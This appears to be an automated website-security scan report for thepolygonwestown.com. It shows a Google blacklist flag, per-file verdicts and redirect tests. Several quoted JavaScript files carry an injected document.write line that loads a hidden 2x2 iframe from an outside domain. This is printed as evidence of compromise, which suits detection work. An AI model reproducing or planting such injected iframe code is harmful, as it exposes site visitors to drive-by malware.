Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thepolygonwestown.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://thepolygonwestown.com/ | 200 OK Content-Length: 9472 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: allegriacairo.com ...[2501 bytes skipped]... ;/style> </head> <body> <div align="center" style="width:100%;"><div style="width:1003px; text-align:center;"> <span style="float:right; margin-right:30px; margin-top:5px" id="smap"><a href="_Disclaimer.php">Disclaimer</a> | <a href="sitemap.html">Sitemap</a></span> <div align="left" style="padding:25px;"><a href="http://allegriacairo.com/"><img src="img/Allegria-Homepage-(3)_03.jpg" width="164" height="55" border="0" /></a><img src="img/Allegria-Homepage-(4)_21.jpg" style="float:right; margin-top:15px"/> </div> <div style=" height:30px; width:1003px;"> <div style="position:absolute; z-index:1000" id="layer1"> <div id="smoothmenu1" align="left" class="ddsmoothmenu"> <ul> <li><a href="_home.php">Home</a></li> ...[8588 bytes skipped]... | ||
http://thepolygonwestown.com/JS/gallery.js | 200 OK Content-Length: 4856 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var c = 0;
var x = 0; var y = 0; var u = true; var g = true; var mode = true; var MaxNum ,MaxComment; var currentimg=0; var Go=0; function set(){ document.getElementById("screen").style.width= loadImg.length*500+"px" num=0 while(num < loadImg.length){ if(num==0){ ImgStyle="block"; }else{ ImgStyle="none"; } document.getElementById("screen").innerHTML += "<img src=' SetOpacity(document.getElementById(elemId), Math.round(parseInt(fromOpacity) + (delta * stepNum))); if (stepNum < steps) setTimeout("FadeOpacityStep('" + elemId + "', " + (stepNum+1) + ", " + steps + ", " + fromOpacity + ", " + delta + ", " + timePerStep + ");", timePerStep); } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html></iframe>'); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 14 websites. size: 2x2 src: http://recoveryventurescorp.org/ozzi.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html> | ||
http://thepolygonwestown.com/JS/root.js | 404 Not Found Content-Length: 295 Content-Type: text/html | clean |
http://thepolygonwestown.com/test404page.js | 404 Not Found Content-Length: 299 Content-Type: text/html | clean |
http://thepolygonwestown.com/JS/jquery.js | 404 Not Found Content-Length: 297 Content-Type: text/html | clean |
http://thepolygonwestown.com/JS/jquery.lightbox-0.5.js | 404 Not Found Content-Length: 310 Content-Type: text/html | clean |
http://thepolygonwestown.com/JS/ddsmoothmenu2.js | 200 OK Content-Length: 7845 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var ddsmoothmenu={
arrowimages: {down:['downarrowclass','img/down.gif', 23], right:['rightarrowclass', 'img/right.gif']}, transition: {overtime:300, outtime:300}, shadow: {enable:false, offsetx:5, offsety:5}, showhidedelay: {showdelay: 100, hidedelay: 200}, detectwebkit: navigator.userAgent.toLowerCase().indexOf("applewebkit")!=-1, detectie6: document.all && !window.XMLHttpRequest, css3support: window.msPerformance || (!document.all && document.qu } this.shadow.enable=(document.all && !window.XMLHttpRequest)? false : this.shadow.enable jQuery(document).ready(function($){ if (typeof setting.contentsource=="object"){ ddsmoothmenu.getajaxmenu($, setting) } else{ ddsmoothmenu.buildmenu($, setting) } }) } } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html></iframe>'); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 14 websites. size: 2x2 src: http://recoveryventurescorp.org/ozzi.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html> | ||
http://thepolygonwestown.com/JS/ext_mediaplayer.js | 200 OK Content-Length: 6293 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function insertFlash( strSrc, intWidth, intHeight, strWMode, strScale, strPlayMode, strCLSID, strCODEBASE, strBGcolor, strPosition, strFlashVars )
{ if(strWMode == null || strWMode == "") strWMode = "Opaque"; if(strScale == null || strScale == "") strScale = "noscale"; if(strPlayMode == null || strPlayMode == "") strPlayMode = "true"; var strFlash = '<object classid="' + strCLSID + '" codebase="' + strCODEBASE + '" '; strFlash += ' width="' + intWidt for(m=0; m<els.length; m++){ el=FP_getObjectByID(id,els[n]); if(el) return el; } } return null; } function FP_changePropRestore() { var d=document,x; if(d.$cpe) { for(i=0; i<d.$cpe.length; i++) { x=d.$cpe[i]; if(x.v=="") x.v=""; eval("x."+x.n+"=x.v"); } d.$cpe=null; } } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html></iframe>'); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 14 websites. size: 2x2 src: http://recoveryventurescorp.org/ozzi.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html> | ||
http://thepolygonwestown.com/JS/jquery-1.4.4.min.js | 200 OK Content-Length: 78757 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-"+b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return true}function la(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ka(a){var b,d,e,f,h,l,k,o,x,r,A,C=[];f=[];h=c.data(this,this.nodeType?"events":"__events__");if(typeof b],f.body["scroll"+b],f.documentElement["scroll"+b],f.body["offset"+b],f.documentElement["offset"+b]);else if(e===B){f=c.css(f,d);var h=parseFloat(f);return c.isNaN(h)?f:h}else return this.css(d,typeof e==="string"?e:e+"px")}})})(window); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http: Antivirus reports:
Hidden iFrame found. The same iFrame was found in 14 websites. size: 2x2 src: http://recoveryventurescorp.org/ozzi.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html> | ||
http://thepolygonwestown.com/JS/jquery.prettyPhoto.js | 200 OK Content-Length: 32005 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.prettyPhoto = {version: '3.0'}; $.fn.prettyPhoto = function(pp_settings) { pp_settings = jQuery.extend({ animation_speed: 'fast', slideshow: false, autoplay_slideshow: false, opacity: 0.80, show_title: true, allow_resize: true, default_width: 500, default_height: 344, counter_separator_label: '/', theme: 'facebook', hideflash: false, wmod name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]"); var regexS = "[\\?&]"+name+"=([^&#]*)"; var regex = new RegExp( regexS ); var results = regex.exec( url ); return ( results == null ) ? "" : results[1]; } })(jQuery); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html></iframe>'); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 14 websites. size: 2x2 src: http://recoveryventurescorp.org/ozzi.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thepolygonwestown.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 15 Jul 2014 05:28:17 GMT
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=cj7971c5jolqcmmh4ens4ht9e1; path=/
X-Powered-By: PHP/5.1.6
GET / HTTP/1.1
Host: thepolygonwestown.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 15 Jul 2014 05:28:17 GMT
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=cj7971c5jolqcmmh4ens4ht9e1; path=/
X-Powered-By: PHP/5.1.6
Second query (visit from search engine):
GET / HTTP/1.1
Host: thepolygonwestown.com
Referer: http://www.google.com/search?q=thepolygonwestown.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: thepolygonwestown.com
Referer: http://www.google.com/search?q=thepolygonwestown.com
Result:
The result is similar to the first query. There are no suspicious redirects found.